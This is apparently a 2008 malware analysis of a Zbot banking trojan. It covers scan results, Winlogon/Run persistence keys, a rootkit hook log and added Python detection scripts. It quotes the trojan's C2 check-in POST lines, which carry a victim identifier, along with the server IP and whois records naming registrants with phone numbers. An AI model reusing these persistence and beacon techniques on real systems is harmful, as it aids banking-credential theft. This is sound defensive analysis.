<h4>
File details
</h4>
Filename: _tmp1147.exe

Additional information
File size: 44032 bytes
MD5: 0834a772dea34a1175e4818f16a2ed9f
SHA1: 755e8cbe31e27dea14fa0f48948addb5b0a2c726
PEiD: -
QUOTE
File _tmp1147.exe received on 02.23.2008 19:45:24
AhnLab-V3 2008.2.22.0 2008.02.22 -
AntiVir 7.6.0.67 2008.02.22 -
Authentium 4.93.8 2008.02.23 -
Avast 4.7.1098.0 2008.02.22 -
AVG 7.5.0.516 2008.02.22 -
BitDefender 7.2 2008.02.23 -
CAT-QuickHeal 9.50 2008.02.22 (Suspicious) - DNAScan
ClamAV 0.92.1 2008.02.23 -
DrWeb 4.44.0.09170 2008.02.23 -
eSafe 7.0.15.0 2008.02.21 Suspicious File
eTrust-Vet 31.3.5557 2008.02.23 -
Ewido 4.0 2008.02.23 -
FileAdvisor 1 2008.02.23 -
Fortinet 3.14.0.0 2008.02.23 -
F-Prot 4.4.2.54 2008.02.22 -
F-Secure 6.70.13260.0 2008.02.22 Suspicious:W32/Malware!Gemini
Ikarus T3.1.1.20 2008.02.23 Trojan-Spy.Win32.Zbot.aft
Kaspersky 7.0.0.125 2008.02.23 -
McAfee 5236 2008.02.22 -
Microsoft 1.3204 2008.02.23 -
NOD32v2 2898 2008.02.23 -
Norman 5.80.02 2008.02.22 -
Panda 9.0.0.4 2008.02.23 Suspicious file
Prevx1 V2 2008.02.23 -
Rising 20.32.52.00 2008.02.23 -
Sophos 4.26.0 2008.02.23 -
Sunbelt 3.0.893.0 2008.02.23 -
Symantec 10 2008.02.23 -
TheHacker 6.2.9.228 2008.02.23 -
VBA32 3.12.6.1 2008.02.21 -
VirusBuster 4.3.26:9 2008.02.23 -
Webwasher-Gateway 6.6.2 2008.02.23 Win32.Malware.gen (suspicious)
<h4>
Visible signs
</h4>
Logfile of Trend Micro HijackThis v2.0.2
....
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\ntos.exe,
O4 - HKCU\..\Run: [userinit] C:\WINDOWS\system32\ntos.exe
O4 - HKUS\S-1-5-18\..\Run: [userinit] C:\WINDOWS\system32\ntos.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [userinit] C:\WINDOWS\system32\ntos.exe (User 'Default user')

<h4>
Technical details
</h4>
Registry changes.
  • Adds different entries to ensure survival upon reboot.
    QUOTE
    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run "userinit"
    Type: REG_SZ
    Data: C:\WINDOWS\system32\ntos.exe
    HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run "userinit"
    Type: REG_SZ
    Data: C:\WINDOWS\system32\ntos.exe
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Userinit"
    Old type: REG_SZ
    New type: REG_SZ
    Old data: C:\WINDOWS\system32\userinit.exe,
    New data: C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\ntos.exe,
  • Creates a unique ID to identify the victim. This string is composed of the computer name and some random numbers / letters, and will be used when uploading information to the server.
    QUOTE
    HKEY_USERS\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Network "UID"
    Type: REG_SZ
    Data: %computername%_00022A82
    HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Network "UID"
    Type: REG_SZ
    Data: %computername%_000229C3
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network "UID"
    Type: REG_SZ
    Data: %computername%_000227ED
  • Modifies the location of the following folders.
    QUOTE
    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cache"
    Old data: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files
    New data: C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files
    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cookies"
    Old data: C:\Documents and Settings\NetworkService\Cookies
    New data: C:\WINDOWS\system32\config\systemprofile\Cookies
    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "History"
    Old data: C:\Documents and Settings\NetworkService\Local Settings\History
    New data: C:\WINDOWS\system32\config\systemprofile\Local Settings\History
    HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cache"
    Old data: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files
    New data: C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files
    HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cookies"
    Old data: C:\Documents and Settings\NetworkService\Cookies
    New data: C:\WINDOWS\system32\config\systemprofile\Cookies
    HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "History"
    Old data: C:\Documents and Settings\NetworkService\Local Settings\History
    New data: C:\WINDOWS\system32\config\systemprofile\Local Settings\History
  • Misc. additions.
    QUOTE
    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer "{6780A29E-6A18-0C70-1DFF-1610DDE00108}"
    Type: REG_BINARY
    Data: ÷ ò
    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer "{F710FA10-2031-3106-8872-93A2B5C5C620}"
    Type: REG_BINARY
    Data: ÷ ò
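The registry changes listed above are the host-side indicators a responder would check for: an extra executable appended to Winlogon's Userinit value, Run values named after a logon component, and the victim UID written under the Network key. The following audit script is an added example, not code from the original post or from any vendor; its sample entries are constructed from the key/value/data triples quoted on the page (plus two benign entries for contrast), and the rules assume that a clean Windows XP-era Userinit value holds only userinit.exe.

```python
"""Audit registry values for the Zbot persistence and victim-ID markers listed above.

Added example, not code from the original post or from any vendor.
SAMPLE_ENTRIES are constructed from the values quoted on the page, plus two
benign entries; the detection rules are assumptions about a clean system.
"""
import re
from typing import Dict, List, Tuple

Finding = Tuple[str, str, str]  # (rule name, registry path, detail)

# Assumption: a clean Winlogon\Userinit holds exactly this one entry
# (the trailing comma in the real value is normal and is dropped on split).
EXPECTED_USERINIT = {r"c:\windows\system32\userinit.exe"}

# Run value names that imitate logon components (the page shows "userinit").
SUSPICIOUS_RUN_NAMES = {"userinit", "winlogon", "explorer"}

# <computername>_<7-8 hex digits>: the UID shape seen in the registry and the POST requests.
UID_RE = re.compile(r"^[^_]+_[0-9A-F]{7,8}$")


def split_userinit(data: str) -> List[str]:
    """Split a comma-separated Userinit value into lower-cased paths, dropping empties."""
    return [p.strip().lower() for p in data.split(",") if p.strip()]


def audit_registry(entries: List[Dict[str, str]]) -> List[Finding]:
    """Return one finding per suspicious value; an empty list means nothing matched."""
    findings: List[Finding] = []
    for e in entries:
        key, name, data = e["key"], e["name"], e["data"]
        path = f'{key} "{name}"'
        low_key, low_name = key.lower(), name.lower()

        if low_key.endswith(r"windows nt\currentversion\winlogon") and low_name == "userinit":
            # Rule 1: anything beyond userinit.exe is launched at every interactive logon.
            for extra in split_userinit(data):
                if extra not in EXPECTED_USERINIT:
                    findings.append(("userinit-extra", path, extra))

        elif low_key.endswith(r"currentversion\run") and low_name in SUSPICIOUS_RUN_NAMES:
            # Rule 2: a Run value named after a system component is a red flag on its own.
            findings.append(("run-impersonates-system", path, data))

        elif low_key.endswith(r"currentversion\network") and low_name == "uid" and UID_RE.match(data):
            # Rule 3: the victim identifier written before the trojan reports to its server.
            findings.append(("zbot-uid", path, data))
    return findings


# Constructed from the values quoted in the post (not a live registry dump).
SAMPLE_ENTRIES: List[Dict[str, str]] = [
    {"key": r"HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run",
     "name": "userinit", "data": r"C:\WINDOWS\system32\ntos.exe"},
    {"key": r"HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run",
     "name": "userinit", "data": r"C:\WINDOWS\system32\ntos.exe"},
    {"key": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon",
     "name": "Userinit",
     "data": r"C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\ntos.exe,"},
    {"key": r"HKEY_USERS\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Network",
     "name": "UID", "data": "%computername%_00022A82"},
    {"key": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network",
     "name": "UID", "data": "%computername%_000227ED"},
    # Benign entries for contrast (constructed).
    {"key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
     "name": "ctfmon.exe", "data": r"C:\WINDOWS\system32\ctfmon.exe"},
    {"key": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon",
     "name": "Shell", "data": "Explorer.exe"},
]

if __name__ == "__main__":
    for rule, path, detail in audit_registry(SAMPLE_ENTRIES):
        print(f"[{rule}] {path} -> {detail}")
```

On the sample data the script reports five findings: the two Run values, the ntos.exe entry appended to Userinit, and the two UID values; the ctfmon.exe and Shell entries produce nothing. Feeding it a real export (for example the output of a `reg query` walk converted to the same key/name/data triples) works the same way.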
Folders added.

QUOTE
%System%\wsnpoem
Files added.

QUOTE
%System%\ntos.exe
Date: 8/4/2004 1:00 PM
Size: 128,512 bytes
%System%\wsnpoem\audio.dll
Date: 2/23/2008 8:44 PM
Size: 119 bytes
%System%\wsnpoem\video.dll
Date: 2/23/2008 8:44 PM
Size: 32,902 bytes
Note: %System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).

<h4>
Rootkit Scan
</h4>
QUOTE
GMER 1.0.14.13998 - http://www.gmer.net
Rootkit scan 2008-02-24 13:09:03
Windows 5.1.2600 Service Pack 2

---- User IAT/EAT - GMER 1.0.14 ----

IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrLoadDll] 00AC4203
IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrGetProcedureAddress] 00AC41C5
IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 00AC4192
IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetClipboardData] 00ACB490
IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetMessageW] 00ACB777
IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!PeekMessageW] 00ACB7D2
IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!PeekMessageW] 00ACB7D2
IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetMessageW] 00ACB777
IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetClipboardData] 00ACB490
IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!GetMessageA] 00ACB74B
IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!GetMessageW] 00ACB777
IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!PeekMessageA] 00ACB7A3
IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!PeekMessageW] 00ACB7D2
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrLoadDll] 00B14203
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrGetProcedureAddress] 00B141C5
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 00B14192
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\LSASRV.dll [ntdll.dll!LdrLoadDll] 00B14203
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\SAMSRV.dll [ntdll.dll!LdrLoadDll] 00B14203
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\SAMSRV.dll [ntdll.dll!LdrGetProcedureAddress] 00B141C5
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetClipboardData] 00B1B490
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetMessageW] 00B1B777
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!PeekMessageW] 00B1B7D2
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!PeekMessageW] 00B1B7D2
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetMessageW] 00B1B777
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetClipboardData] 00B1B490
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!GetMessageA] 00B1B74B
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!GetMessageW] 00B1B777
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!PeekMessageA] 00B1B7A3
IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!PeekMessageW] 00B1B7D2
IAT C:\WINDOWS\system32\svchost.exe[720] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 00724192
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrLoadDll] 00854203
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrGetProcedureAddress] 008541C5
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 00854192
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetClipboardData] 0085B490
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetMessageW] 0085B777
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!PeekMessageW] 0085B7D2
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!PeekMessageW] 0085B7D2
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetMessageW] 0085B777
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetClipboardData] 0085B490
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!GetMessageA] 0085B74B
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!GetMessageW] 0085B777
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!PeekMessageA] 0085B7A3
IAT C:\WINDOWS\system32\svchost.exe[804] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!PeekMessageW] 0085B7D2
...
etc
...

---- EOF - GMER 1.0.14 ----
Note: Due to the length of the scan, I left out a huge part of the log. The rootkit is hooked into each running process.
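A full GMER log of this kind runs to hundreds of IAT lines, so the useful first step is to collapse it per process: which imports are redirected, from which modules, and whether all hook targets land in one small region (one injected blob) rather than in scattered legitimate shims. The summariser below is an added example, not GMER's code or part of the original post; its sample lines follow the shape of the scan quoted above, and the "watched" import list and the single-region heuristic are this example's own assumptions.

```python
"""Summarise GMER 'User IAT/EAT' lines per process to triage user-mode hooks.

Added example, not GMER's code or part of the original post. SAMPLE_LOG is
constructed in the shape of the scan quoted above; WATCHED and the
single-region heuristic are assumptions made for this example.
"""
import re
from typing import Dict, List, Optional

# IAT <process>[<pid>] @ <module> [<dll>!<function>] <hook address>
IAT_RE = re.compile(
    r"^IAT (?P<proc>.+?)\[(?P<pid>\d+)\] @ (?P<module>\S+) "
    r"\[(?P<dll>[^!\]]+)!(?P<func>[^\]]+)\] (?P<addr>[0-9A-Fa-f]{8})$"
)

# Imports whose redirection fits the behaviour the post describes: controlling
# DLL loading and thread creation, and tapping the clipboard and message loops.
WATCHED = {
    "LdrLoadDll", "LdrGetProcedureAddress", "NtCreateThread",
    "GetClipboardData", "GetMessageA", "GetMessageW", "PeekMessageA", "PeekMessageW",
}


def parse_iat_line(line: str) -> Optional[dict]:
    """Return the parsed fields of one IAT line, or None for headers and blank lines."""
    m = IAT_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    d["pid"] = int(d["pid"])
    d["addr"] = int(d["addr"], 16)
    return d


def summarize(lines: List[str]) -> Dict[int, dict]:
    """Group hooks by pid and derive two triage signals per process."""
    per: Dict[int, dict] = {}
    for line in lines:
        h = parse_iat_line(line)
        if h is None:
            continue
        p = per.setdefault(h["pid"], {"process": h["proc"], "funcs": set(),
                                      "modules": set(), "addrs": set()})
        p["funcs"].add(h["func"])
        p["modules"].add(h["module"].rsplit("\\", 1)[-1].lower())
        p["addrs"].add(h["addr"])
    for p in per.values():
        # All hook targets inside one 64 KiB-aligned region is consistent with a
        # single injected code blob rather than several independent shims.
        p["single_region"] = len({a >> 16 for a in p["addrs"]}) == 1
        p["watched"] = sorted(p["funcs"] & WATCHED)
    return per


# Constructed in the shape of the GMER output above (a subset of the lines).
SAMPLE_LOG = [
    "---- User IAT/EAT - GMER 1.0.14 ----",
    "",
    r"IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrLoadDll] 00AC4203",
    r"IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 00AC4192",
    r"IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetClipboardData] 00ACB490",
    r"IAT C:\WINDOWS\system32\services.exe[552] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetMessageW] 00ACB777",
    r"IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrLoadDll] 00B14203",
    r"IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\LSASRV.dll [ntdll.dll!LdrLoadDll] 00B14203",
    r"IAT C:\WINDOWS\system32\lsass.exe[564] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!PeekMessageW] 00B1B7D2",
    r"IAT C:\WINDOWS\system32\svchost.exe[720] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 00724192",
    "---- EOF - GMER 1.0.14 ----",
]

if __name__ == "__main__":
    for pid, p in sorted(summarize(SAMPLE_LOG).items()):
        print(f"{p['process']}[{pid}] hooks={len(p['funcs'])} modules={sorted(p['modules'])} "
              f"single_region={p['single_region']} watched={p['watched']}")
```

Run against the full log the per-process view makes the note above concrete: every process carries the same set of redirected imports, and within each process the targets share one region (00AC4xxx/00ACBxxx in services.exe, 00B14xxx/00B1Bxxx in lsass.exe), which is what a single injected code blob looks like.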

<h4>
Notes
</h4>
Trojan-Spy.Win32.Zbot.ajd is a rootkit / banking trojan that
  • may disable the firewall.
  • steals sensitive financial data (credit card numbers, online banking login details).
  • makes screen snapshots.
  • downloads additional components.
  • provides remote access to the compromised system.
  • in previous versions, could send out spam with a built-in SMTP engine.
The dropper starts by injecting code into winlogon.exe when executed.
If for any reason the dropper is unable to modify the process, it will cause a BSOD, and you might find a copy of the dropper in the All Users\Start Menu\Programs\Startup folder so that the infection occurs on the next reboot.
New memory pages are created in several exe files, and the infection also creates 2 mutexes on the system to mark its presence.
Next, svchost.exe kills the smss.exe process.
Svchost.exe is also listening for inbound connections and will download 2 additional files from the server. They will be renamed as audio.dll and video.dll. The IP is hardcoded into the dropper.
The trojan will report back information to the server, using the unique identifier.

CODE
POST /templog/s.php?1=KLY-0FD93CFED46_00038E7&i=
POST /templog/s.php?2=KLY-0FD93CFED46_00038E7&n=1&v=16777739&i=&s=0&sp=0&lcp=0&pr=0
Note: The identifier seen here is different from the one in the registry changes due to a different session.
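The two POST requests above are the network-side counterpart of the registry UID: a first check-in carrying `1=<uid>` and a status report carrying `2=<uid>` plus counters. The script below, an added example that is not part of the original post, flags that shape in a web proxy log. The log layout (`date time client method url status`) is an assumption made here; the two request lines are taken from the post, the destination host is the IP given in the "Offending IP" section, and the remaining lines are constructed benign traffic.

```python
"""Flag Zbot-style check-in requests in web proxy logs.

Added example, not from the original post. LOG_LINES use an assumed
"<date> <time> <client> <method> <url> <status>" layout; the two request
lines come from the post, the rest are constructed benign traffic.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# <computername>_<7-8 hex digits>, e.g. KLY-0FD93CFED46_00038E7 (derived from the page).
UID_RE = re.compile(r"^([A-Za-z0-9-]+)_([0-9A-F]{7,8})$")

Hit = Tuple[str, str, str, str]  # (kind, client, computer name, destination host)


def classify_request(method: str, url: str) -> Optional[Tuple[str, str, str]]:
    """Return (kind, computer name, host) if the request looks like a beacon, else None."""
    parts = urlsplit(url)
    if method.upper() != "POST" or not parts.path.lower().endswith("/s.php"):
        return None
    q = parse_qs(parts.query, keep_blank_values=True)
    # "1=<uid>" is the first check-in; "2=<uid>&n=..&v=.." is the status report.
    for param, kind in (("1", "checkin"), ("2", "report")):
        for value in q.get(param, []):
            m = UID_RE.match(value)
            if m:
                return kind, m.group(1), parts.hostname or ""
    return None


def scan_proxy_log(lines: List[str]) -> List[Hit]:
    """Walk the log and collect one hit per matching request."""
    hits: List[Hit] = []
    for line in lines:
        fields = line.split()
        if len(fields) < 6:
            continue  # blank or malformed line
        _, _, client, method, url, _ = fields[:6]
        r = classify_request(method, url)
        if r:
            kind, computer, host = r
            hits.append((kind, client, computer, host))
    return hits


# Constructed proxy log: the two POSTs from the post plus benign requests.
LOG_LINES = [
    "2008-02-24 13:10:01 10.0.0.5 POST http://124.217.252.193/templog/s.php?1=KLY-0FD93CFED46_00038E7&i= 200",
    "2008-02-24 13:10:03 10.0.0.5 POST http://124.217.252.193/templog/s.php?2=KLY-0FD93CFED46_00038E7&n=1&v=16777739&i=&s=0&sp=0&lcp=0&pr=0 200",
    "2008-02-24 13:10:05 10.0.0.7 GET http://www.example.com/s.php?1=hello 200",
    "2008-02-24 13:10:06 10.0.0.7 POST http://www.example.com/forum/post.php?t=12 302",
    "",
]

if __name__ == "__main__":
    for kind, client, computer, host in scan_proxy_log(LOG_LINES):
        print(f"{kind:8s} client={client} victim={computer} server={host}")
```

The match is deliberately tied to the UID shape rather than to the hardcoded IP, so it still fires when the server address changes; the `1=`/`2=` distinction lets a responder tell a fresh infection from an established one that is already reporting counters.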
______________________________

For those interested, I made a video of its behavior back in June 2007. You can view it by clicking on the Camtasia logo below.

Note: Flash Player is needed.

[Camtasia logo]
______________________________

Additional references by Nicolas Brulez, 'senior virus researcher' at Websense:
<h4>
Offending IP
</h4>
topsthc.com - 124.217.252.193

QUOTE
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-02-10
Expires: 2009-02-10
Registrar Status: clientTransferProhibited
Name Server: NS1.PREMIUM-DNS.COM (has 304 domains)
Name Server: NS2.PREMIUM-DNS.COM
Whois Server: whois.estdomains.com
Server Type: Apache/1.3.39 (Unix) PHP/5.2.2 mod_ssl/2.8.30 OpenSSL/0.9.7a mod_perl/1.29 FrontPage/5.0.2.2510
IP Address: 124.217.252.193
IP Location - Malaysia - Piradius Net
Response Code: 403
Blacklist Status: Clear
Domain Status: Registered And Active Website
Registration Service Provided By: WEBST.RU
Contact: +7.9139079575
Website: http://webst.ru/

Domain Name: TOPSTHC.COM

Registrant:
Jooksed
Moriturus ()
Kyevskaya 15
Kyev
Kiev Oblast,03150
UA
Tel. +097.8754218

Creation Date: 10-Feb-2008
Expiration Date: 10-Feb-2009

Domain servers in listed order:
ns2.premium-dns.com
ns1.premium-dns.com

alljobwork.info - 209.51.154.100

QUOTE
Created: 2008-02-18
Expires: 2009-02-18
Whois Server: whois.afilias.info
IP Address: 209.51.154.100
IP Location - Georgia - Lilburn - Global Net Access Llc
Response Code: 200
Blacklist Status: Clear
Domain Status: Registered And Active Website
Domain ID:D23837576-LRMS
Domain Name:ALLJOBWORK.INFO
Created On:18-Feb-2008 07:19:54 UTC
Last Updated On:18-Feb-2008 07:21:08 UTC
Expiration Date:18-Feb-2009 07:19:54 UTC
Sponsoring Registrar:EstDomains, Inc. (R295-LRMS)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:DI_7755132
Registrant Name:Shevchenko Ilya
Registrant Organization:N/A
Registrant Street1:ul. Svobodi d.16
Registrant Street2:
Registrant Street3:
Registrant City:SanktPiterburg
Registrant State/Province:Leningradskaya oblast
Registrant Postal Code:132631
Registrant Country:RU
Registrant Phone:+7.8122574598
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Name Server:NS1.THEJETHOST.ORG
Name Server:NS2.THEJETHOST.ORG